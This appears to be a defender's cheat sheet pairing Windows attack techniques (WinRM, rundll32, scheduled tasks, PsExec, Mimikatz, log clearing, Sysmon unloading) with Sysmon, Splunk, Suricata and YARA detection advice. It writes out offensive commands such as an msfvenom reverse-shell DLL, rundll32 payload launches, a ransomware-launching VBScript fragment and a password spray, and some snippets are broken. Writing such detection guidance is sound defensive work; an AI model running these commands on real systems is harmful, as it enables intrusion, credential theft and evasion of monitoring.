General

WinRM Overview

Windows Remote Management, allows remote system management.

Enabling WinRM

Not enabled by default, requires configuration.

https://docs.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management

Common Commands

Commands for remote execution.

Enter-PSSession -Computername <IP> -Credentials (Get-Credential)

Invoke-Command -ComputerName 192.168.1.12 -ScriptBlock {get-childitem} -Credential (Get-Credential)

File operations remotely.

$cred = Get-Credential $session = New-PSSession -ComputerName 192.168.1.12 -Credential $cred Copy-Item -Path C:\entry.txt -Destination c:\temp\entry.txt -ToSession $session

Detection - Host

Artifacts indicating remote PowerShell execution.

EID 6: Attempt to connect using WinRM.

EID 142: WSMan operation CreateShell failed.

EID 161: WSMan disabled on remote server.

EID 162: Incorrect credentials.

EID 16: Closing WSMan shell.

Detection - Remote

Artifacts indicating remote PowerShell execution on the remote machine.

EID 400: Start of connection, includes HostName, HostApplication, RunspaceId.

EID 403: End of connection, matches RunspaceId in EID 400.

EID 600: Details of remote command execution process.

EID 91: Connection succeeded.

Security Log

Security-related artifacts.

EID 4624 Logon Type 3: Shows source workstation of the connection.

Resources

Additional information on WinRM.

https://docs.microsoft.com/en-us/windows/win32/winrm/portal

WSH (Windows Script Host)

Automation technology for Windows. Supports scripting similar to batch files.

Can be used to execute malicious scripts.

Monitor for unusual script executions or modifications.

Executables (Wscript.exe and Cscript.exe)

Wscript supports GUI, Cscript supports CLI.

Execution of malicious scripts through these executables.

Monitor for unusual activity or command-line arguments in Wscript.exe and Cscript.exe.

VBScript Example

Scripting language supported by WSH.

Set wshShell = CreateObject("WScript.Shell") strUserName = wshShell.ExpandEnvironmentStrings("%USERNAME%") ... objShell.run("C:\Users\"& strUserName &"\AppData\Local\Temp\ransomware.exe") Downloads and executes ransomware.

Use Sysmon to monitor for process creation events involving VBScript files.

JScript Example

Another scripting language supported by WSH.

a = new ActiveXObject('Wscript.Shell'); cmd = "powershell -ep Bypass ..."; a.Run(cmd,0); Executes a PowerShell command to download and run a payload.

Monitor for JScript files executing PowerShell commands or making network calls.

Sysmon Detection

System monitoring tool for Windows.

-

Configure Sysmon to log process creation with command-line details. Look for instances of Cscript.exe or Wscript.exe executing scripts from unusual locations.

Network Monitoring

Observing network traffic for anomalies.

Detecting network calls to known malicious domains or unusual data transfer patterns.

Use network monitoring tools to watch for outbound connections to suspicious IPs or domains.

File System Monitoring

Monitoring file system for changes.

Detecting creation of new, unexpected executable files.

Implement file integrity monitoring to detect changes in system directories or creation of new executables.

Create Scheduled Task

$InterfaceNumber = 7 $Path = $env:APPDATA + "\Output.pcap" $Action = New-ScheduledTaskAction -Execute 'C:\Program Files\Wireshark\tshark.exe' -Argument " -i $InterfaceNumber -w $Path -a duration:10" $Trigger = New-ScheduledTaskTrigger -Once -At "8/26/2019 4:00:00 AM" $setting = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "Tshark Network Traffic" -Description "Run Tshark" -Settings $setting

PowerShell script to create a scheduled task for running Tshark.

Monitor for PowerShell script executions that register new scheduled tasks.

List Scheduled Tasks

`$Tasks = Get-ScheduledTask -TaskPath \

select TaskName,Actions,Triggers<br>foreach($task in $Tasks){<br>$task.TaskName

Out-String<br>$task.Actions

Create Task on Remote Machine

SCHTASKS /Create /S [Remote Machine Hostname] /U domain\user /P password /SC Daily /Evil /TR c:\evil.exe /ST 18:30

Command to create a scheduled task on a remote machine to execute a potentially malicious file.

Monitor for remote task creation commands, especially those specifying unusual or unknown executables.

Scheduled Task XML File

XML configuration file for a scheduled task.

The XML file is created by the PowerShell script and defines the task settings.

Monitor for creation or modification of XML files in C:\Windows\System32\Tasks and C:\Windows\Tasks.

Detection with Sysmon

-

-

Configure Sysmon to log file creation events in the scheduled tasks directories and monitor for process creation events involving cmd.exe with schtasks.exe in the command line, or PowerShell executing scheduled task cmdlets.

Create Malicious DLL

msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[Port] -f dll -o evil.dll

Using Metasploit's msfvenom to create a reverse TCP meterpreter DLL.

Monitor for the creation of new DLL files, especially those generated by known tools like msfvenom.

Run DLL with Rundll32

rundll32 \\webdavserver\evil.dll,entrypoint rundll32 C:\evil.dll,EntryPoint rundll32 shell32.dll,Control_RunDLL C:\evil.dll

Commands to execute a DLL using Rundll32.

Monitor for Rundll32 executions with unusual command-line arguments, especially loading DLLs from suspicious paths.

Run JavaScript with Rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -c new-item c:\\users\\noname\\desktop\\testrund.txt",0);window.close();

Using Rundll32 to execute JavaScript that runs a PowerShell command.

Monitor for Rundll32 executing JavaScript, especially those that invoke PowerShell or other scripting engines.

Sysmon Detection - Process Creation

-

-

Configure Sysmon to log Rundll32 process creation events, especially with cmd.exe as the parent process.

Sysmon Detection - Module Loading

-

-

Monitor for Rundll32 loading specific modules like ws2_32.dll, which could indicate network activity.

Sysmon Detection - Network Connection

-

-

Monitor for network connections initiated by Rundll32 processes.

Sysmon Rule Example

<Sysmon schemaversion="4.00"> <HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms> <EventFiltering> <ProcessCreate onmatch="include"> <Image condition="contains">Rundll32.exe</Image> </ProcessCreate> <NetworkConnection> <Image condition="contains">Rundll32.exe</Image> </NetworkConnection> <ImageLoad onmatch="include"> <ImageLoaded condition="contains">ws2_32.dll</ImageLoaded> </ImageLoad> </EventFiltering> </Sysmon>

Example Sysmon rule for monitoring Rundll32 activities.

Implement this Sysmon rule to detect suspicious Rundll32 activities. Note: This rule is for demonstration and should be customized for specific environments.

Discovery

$ nmap -sC -sV 192.168.1.7

Using Nmap to discover services on a target machine, identifying potential services vulnerable to password spraying.

Monitor for multiple, rapid connection attempts or port scans from a single IP address.

Password Spray Attack

./spray.sh -smb 192.168.1.7 users.txt passwords.txt 0 0 WORKGROUP

Executing a password spray attack against SMB service using a list of usernames and passwords.

Monitor for multiple failed login attempts across different user accounts within a short time frame.

Detection with Windows Security Events

source="WinEventLog:Security" earliest=-10m AND EventCode="4625" | stats count(EventCode) by Source_Network_Address,Account_Name | sort - count | where Account_Name != "-"

Using Splunk to search for multiple failed login attempts (Event ID 4625) from the same IP address.

Set up alerts for multiple login failures (Event ID 4625) from the same source IP against different user accounts.

Analyzing Event Patterns

source="WinEventLog:Security" earliest=-10m | stats list(EventCode) as c_list BY Account_Name

Analyzing the sequence of Windows Security Event IDs to detect a pattern of failed logins followed by a success.

Look for patterns where multiple login failures for a user are followed by a successful login, indicating potential account compromise.

PsExec Execution

.\PsExec.exe \\DESKTOP-QTEKH69 -u <username> -p <password> powershell

Command to execute a process remotely using PsExec.

Monitor for PsExec execution patterns, especially with command-line arguments indicating remote execution.

Network Login

-

PsExec authenticates to the target device, creating a network login event.

Monitor for Event ID 4624 with logon type 3, indicating a network login.

File Creation on ADMIN$

-

PsExec connects to ADMIN$ share to drop PSEXESVC.exe.

Use Sysmon to monitor for file creation events, especially the creation of PSEXESVC.exe in C:\Windows.

Service Creation

-

PsExec starts the PSEXESVC service on the target.

Monitor for Event ID 4697 and registry key creation for new services, particularly PSEXESVC.

Named Pipe Creation

-

PsExec creates multiple named pipes for communication.

Monitor for the creation of named pipes, especially those containing PSEXESVC.

Sysmon Detection Rules

<Sysmon schemaversion="4.22"> ... <FileCreate onmatch="include"> <TargetFilename name="PSEXEC" condition="contains">C:\Windows\PSEXESVC.exe</TargetFilename> </FileCreate> ... <PipeEvent onmatch="include"> <PipeName name="PSEXEC" condition="contains">PSEXESVC</PipeName> </PipeEvent> ... <RegistryEvent onmatch="include"> <TargetObject name="PSEXEC" condition="contains">\SYSTEM\CurrentControlSet\Services\PSEXESVC</TargetObject> </RegistryEvent> ...</Sysmon>

Example Sysmon rules for monitoring PsExec activities.

Implement these Sysmon rules to detect suspicious PsExec activities.

Suricata Detection Rule

`alert smb any any -> $HOME_NET any (msg: "PSEXEC"; content: "

50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 65 00 78 00 65 00

" ; sid:22000005;rev:1;)`

Execution of Mimikatz

mimikatz.exe Invoke-Mimikatz Invoke-PSImage Dump the LSASS and send it over network

Various methods to execute Mimikatz, including direct execution, PowerShell scripts, and dumping LSASS process memory.

Monitor for process creation, PowerShell script execution, and LSASS memory dumping activities.

Process Access to LSASS

-

Mimikatz accesses the LSASS process to extract credentials.

Use Sysmon to monitor for unauthorized access to the LSASS process.

Module Loading

-

Mimikatz loads specific modules like vaultcli.dll and bcryptprimitives.dll.

Monitor for the loading of these modules, which can indicate credential dumping activities.

Sysmon Detection Rules

<Sysmon schemaversion="4.00"> ... <ProcessAccess onmatch="include"> <SourceImage condition="contains">mimikat</SourceImage> <TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage> </ProcessAccess> ... <ImageLoad onmatch="include"> <ImageLoaded condition="contains">vaultcli.dll</ImageLoaded> <ImageLoaded condition="contains">bcryptprimitives.dll</ImageLoaded> </ImageLoad> ...</Sysmon>

Example Sysmon rules for monitoring Mimikatz activities.

Implement these Sysmon rules to detect suspicious Mimikatz activities.

PowerShell Logging

-

PowerShell logging can capture script execution, including Mimikatz scripts.

Enable PowerShell script block logging to capture the execution of scripts like Invoke-Mimikatz.

Dump LSASS using Procdump

-

Using Procdump to dump LSASS process memory, which can then be analyzed by Mimikatz.

Monitor for the execution of Procdump with command-line arguments targeting LSASS.

Invoke-PSImage Detection

-

Detection of Invoke-PSImage, a method to execute PowerShell scripts hidden in images.

Monitor for PowerShell script block logging containing aliases like Sal and the downloading of .png images from the internet.

Protection Against Password Dumping

-

Microsoft's LSA protection and Credential Guard.

Ensure LSA protection is enabled and Credential Guard is deployed to obfuscate credentials in memory.

VBA Macros

Malicious macros embedded in Office documents.

Monitor registry edits for \Security\Trusted indicating a user has trusted a document. Use Sysmon to track registry changes.

Dynamic Data Exchange (DDE)

Method enabling Office applications to get data from another application, potentially executing malicious commands.

Monitor Microsoft Office Alerts (OAlerts.evtx) for Event ID 300 indicating execution of unexpected commands.

Object Linking & Embedding (OLE)

Feature allowing the creation of objects in one application and embedding them in another, potentially leading to buffer overflow vulnerabilities.

Monitor process creation where the parent process is in the Microsoft Office directory, indicating potential OLE exploitation.

Clearing Logs

Attackers may clear event logs to cover their tracks.

Monitor for Event IDs 1102 (Security) and 104 (System) which indicate log clearing.

Terminate Event Log Process

Suspending or killing the Event Log process to stop logging.

Monitor for the absence of the Event Log service or unexpected termination of the svchost -k LocalServiceNetworkRestricted -p -s eventlog process.

Invoke-Phant0m

A PowerShell script used to kill threads responsible for event logging.

Monitor PowerShell logs (Event ID 4104) for script execution patterns matching Invoke-Phant0m.

Mimikatz event::drop

Mimikatz module used to stop logging of specific events like 1102 and 104.

Monitor for process access patterns and module loading indicative of Mimikatz usage.

Python Payloads

Base64 encoded Python code executed via command line.

Monitor for Python command lines containing Base64 decoding patterns.

PowerShell Payloads

Base64 encoded PowerShell scripts executed via command line.

Monitor for PowerShell command lines with encodedCommand parameters or Base64 decoding patterns.

Conhost.exe Misuse

conhost.exe can be used to launch other executables, potentially bypassing security controls.

Monitor for process creation events where conhost.exe is the parent image.

Malicious CHM Files

CHM files can be modified to include JavaScript or VBScript that executes harmful commands, including PowerShell scripts.

Monitor for process creation events involving hh.exe and subsequent execution of command-line interpreters or PowerShell.

CMSTP Executing DLLs

Using cmstp.exe to run malicious DLLs.

Monitor for cmstp.exe process creation followed by the loading of unusual DLLs.

CMSTP Executing SCT Files

Using cmstp.exe to execute SCT scriptlets.

Monitor for cmstp.exe process creation with command lines referencing SCT files.

Privilege Escalation via CMSTP

Misusing cmstp.exe for privilege escalation.

Monitor for abnormal patterns of cmstp.exe usage that could indicate privilege escalation attempts.

BITS for Malicious Downloads

Using BITS to stealthily download and execute files.

Monitor for BITS-related activities and analyze BITS job creation events.

Malicious Use of ADS

Using ADS to hide and execute malicious scripts, DLLs, or executables.

Monitor for file stream creation and execution of files from ADS.

YARA for XOR Detection

YARA is used to identify files or network traffic that contain patterns indicative of XOR encryption, which is often used in malware obfuscation.

xor_detection rule to identify common XOR patterns.

CAPA for Hook Injection

CAPA rules to detect the setting of global application hooks, often used in hook injection attacks.

set global application hook and set application hook rules.

SIGMA for Hook Injection

SIGMA rules to detect instances of hook injection in Windows, based on specific API function calls.

Hook Injection Detection rule.

YARA for Hook Injection

YARA rules to identify hook injection by looking for specific function calls in binary files.

HookInjection rule.

YARA for DLL Search Order Hijacking Detection

YARA is used to identify files that contain patterns indicative of DLL Search Order Hijacking, a common technique used in malware and software exploitation.

DLLHijacking rule to identify specific patterns in DLL files.

YARA for DLL Export Name Modification Detection

YARA is used to identify files that contain patterns indicative of modifications to DLL export names, a technique used in sophisticated malware and software exploitation.

ModifyDLLExportName rule to identify specific API function calls in DLL files.

YARA for DLL Proxying Detection

YARA is used to identify files that contain patterns indicative of DLL Proxying, a technique used in sophisticated malware for stealth operation and persistence.

DLLProxying rule to identify specific patterns in DLL files.

YARA for Detecting Unloading of Sysmon Driver

YARA is used to identify code patterns indicative of attempts to unload the Sysmon driver, a technique used by malware to evade detection by Sysmon.

fltMC.exe unload SysmonDrv

SysmonEvasion rule to identify specific API function calls.

YARA for Detecting Shortcut Hiding

YARA is used to identify files that contain patterns indicative of Shortcut Hiding, a technique used by malware to evade detection by embedding malicious code in Windows shortcuts.

Python script for creating a Windows shortcut with an embedded file.

YARA_Detect_ShortcutHiding rule to identify specific patterns in shortcut files.

YARA & CAPA for Detecting NtQueryInformationProcess Anti-Debugging

YARA and CAPA are used to identify code patterns indicative of the use of NtQueryInformationProcess for anti-debugging, a technique used by malware to evade analysis.

Delphi and C# code snippets to check if a process is being debugged.

YARA and CAPA rules to identify specific patterns related to NtQueryInformationProcess.

YARA for Detecting NtSetInformationThread Anti-Debugging

NtSetInformationThread

Used to hide threads from debuggers.

Delphi code snippet to hide a thread from the debugger.

YARA rule to identify specific patterns related to NtSetInformationThread.

YARA for Detecting NtQueryInformationProcess Anti-Debugging

NtQueryInformationProcess

Retrieves information about a running process to detect if it's being debugged.

Delphi code snippet to check if a process is being debugged.

YARA rule to identify specific patterns related to NtQueryInformationProcess.

CAPA for Detecting Unmoving Mouse Cursor

Checking Mouse Activity

Detects if a sandbox environment doesn't have mouse activity.

Delphi code snippet to check for mouse movement.

CAPA rule to identify specific patterns related to the mouse cursor activity.